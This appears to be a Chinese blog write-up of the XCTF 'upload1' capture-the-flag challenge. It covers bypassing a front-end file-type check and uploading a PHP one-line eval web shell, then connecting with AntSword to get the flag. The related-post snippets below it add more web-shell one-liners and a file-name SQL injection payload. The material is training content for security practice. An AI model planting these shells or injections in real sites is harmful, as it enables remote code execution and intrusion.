代码编织梦想

XCTF-upload1

知识点

题目比较简单,本题知识点

  • 文件上传漏洞
  • 前端绕过
  • 一句话木马getshell

打开网址,直接是文件上传,首先随便上传一个小图片,

上传图片后,发现上传成功,并且成功爆出了路径,打开图片。

打开后发现就是刚才上传的图片。

现在的思路就比较清晰了,上传一个一句话木马,getshell即可。

一句话木马

<?php @eval($_POST['cmd']);?>

其中cmd为木马的密码

尝试上传yijuhua.php,发现文件格式只能是图片,抓包绕过即可。

打开burp后,抓包,发现php依然无法从浏览器发送到burp上,说明是前端校验,直接改写文件格式即可。

上传绕过

首先将yijuhua.php修改文yijuhua.jpg然后抓包,在包中修改文件名称,如下图


可以看到,已经成功绕过。

打开php看看是否已被当做代码执行。

仪剑链接

打开后,发现页面返回值为空,可以基本确定一句话木马执行成功,直接用仪剑连接。

测试下连接,发现成功,直接连接,getshell。

在html文件夹下发现flag

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuanxu8877/article/details/127991358

攻防世界 web进阶—upload-爱代码爱编程

这道题的大体思路是: 利用上传文件的文件名进行sql注入 这里先普及几个mysql函数的用法 1. CONV() 简单的来说这个函数就是用来进行***进制的转换***的 CONV(

攻防世界web进阶之upload-爱代码爱编程

攻防世界WEB进阶之upload 第一步:分析第二步:实操第三步:答案 第一步:分析 难度系数: 1星 题目来源: RCTF-2015 题目描述:暂无 脑洞很大的一题,首先题目什么都没给出,进入场景,注册自己

攻防世界web进阶之upload1_harry_c的博客-爱代码爱编程_upload1

攻防世界WEB进阶之upload1 一、分析二、实操三、答案 难度系数: 1星 题目来源: 暂无 题目描述:暂无 题目场景: 略 题目附件: 暂无 一、分析 首先打开场景,上传文件进行抓包操作,发现

攻防世界web进阶区upload详解-爱代码爱编程

攻防世界web进阶区upload详解 题目②CONV(N,from_base,to_base)③substr(string,start,length) 题目 进入页面是我们的注册 登录以后,发现可以文件上传 传完之后发现有回显,猜测可能是文件名注入 我们先进行一系列得上传测试,发现都不行 这时候,御剑发来了好消息, 这儿有一个incl

file upload 攻防世界_攻防世界upload1-爱代码爱编程

打开一看是文件上传题 1.先上个php一句话(提示上传图片)   一句话:<?php eval($_GET['a']);?> 2.发现有前端js验证 3.推荐添加一个火狐的插件非常好用 启用插件关闭js即可上传成功,并给出了路径 4.然后添加路径访问,构造url使用system命令执行即可取得flag htt

file upload 攻防世界_攻防世界 upload-爱代码爱编程

攻防世界上的一道web题 为什么我觉得完全不像萌新入坑的题呢  退坑还差不多吧 一看名字以及页面想当然的就是文件上传了呗 结果各种尝试,也没什么办法,但是每次我们上传后会有文件名的回显 但是正常的文件上传也都有这种名字的回显,可能不太寻常的就是这个没有路径吧 最后看的writeup  说是sql注入????不明白怎么能看出来是注入的

攻防世界upload-爱代码爱编程

Hex()是MySQL的Sring函数。 此方法返回给定数字或字符串的十六进制字符串 a' +(selselectect conv(substr(hex(database()),1,12),16,10))+ '.jpg 数据库名变成16进制 选取从第一个字母开始,往后数12个字母 hex 16进制再16进制 CONV(n,from_radi

攻防世界 web upload1-爱代码爱编程

之前在玩 dvwa ,正愁题目太少一身技艺无用武之地,突然发现攻防世界上这道题。 打开题目,要求上传文件,很显然的文件上传漏洞。 提交一句话病毒的php文件 <?php @eval($_POST['123']);?> 将密码改为 123.。 但中途被拦下,提示要求上传图片格式文件。打开源代码一看,要求文件后缀为 .jpg 或 .pgn

xctf攻防世界 web高手进阶区 upload1_l8947943的博客-爱代码爱编程

0x01. 进入环境,查看问题 随便上传文件后,发现提示请上传jpg文件。也就是只让上传jpg文件,尝试上传后,如图: 可以直接访问地址:http://61.147.171.105:50326/upload/16595

攻防世界 题库 web upload1 gfsj0236_卡咔伽马的博客-爱代码爱编程

攻防世界 题库 web upload1 GFSJ0236 文章目录 攻防世界 题库 web upload1 GFSJ0236简介 简介 这道题正如题目一样是一道简单的文件上传题 难度:2 类型:web

攻防世界web upload1、warmup_nj_technology的博客-爱代码爱编程

 目录 2022   8.22 (一)upload1  1、构建一句话木马 2、上传文件  3、BP拦截 ​编辑  4、蚁剑连接 (二) warmup (一)upload1  1、构建一句话木马 <?php  @eval($_POST['xiaowei']); echo('xiaowei'); ?>

攻防世界upload3-爱代码爱编程

看到题目为文件上传,且题目描述中有源码泄露。将源码下载后发现为thinkphp5.1,于是直接百度发现thinkphp5.x的反序列化漏洞,但是由于源码中含有查找文件,一开始误以为是文件名注入. 但对源码的审计发现,对上传的文件检查还是比较严格的   还检查了文件头,但是可以使用GIF89a+一句话还是能够上传成功的,上传成功后可以在上传界面

wordpress管理仪表板:在15分钟内成为wordpress专家-爱代码爱编程

WordPress管理仪表板是内容管理系统 (CMS)的核心和灵魂。在这里,您可以监督网站的各个方面,从配置基本设置到发布内容、安装插件和主题等等。如果您不熟悉 WordPress 管理仪表板,您将很难管理网站。 了解如何使用仪表板比您想象的要容易。所有 WordPress 管理组件都非常直观。一旦您学会了如何使用这些不同的工具和设置,您将能够充分利用 W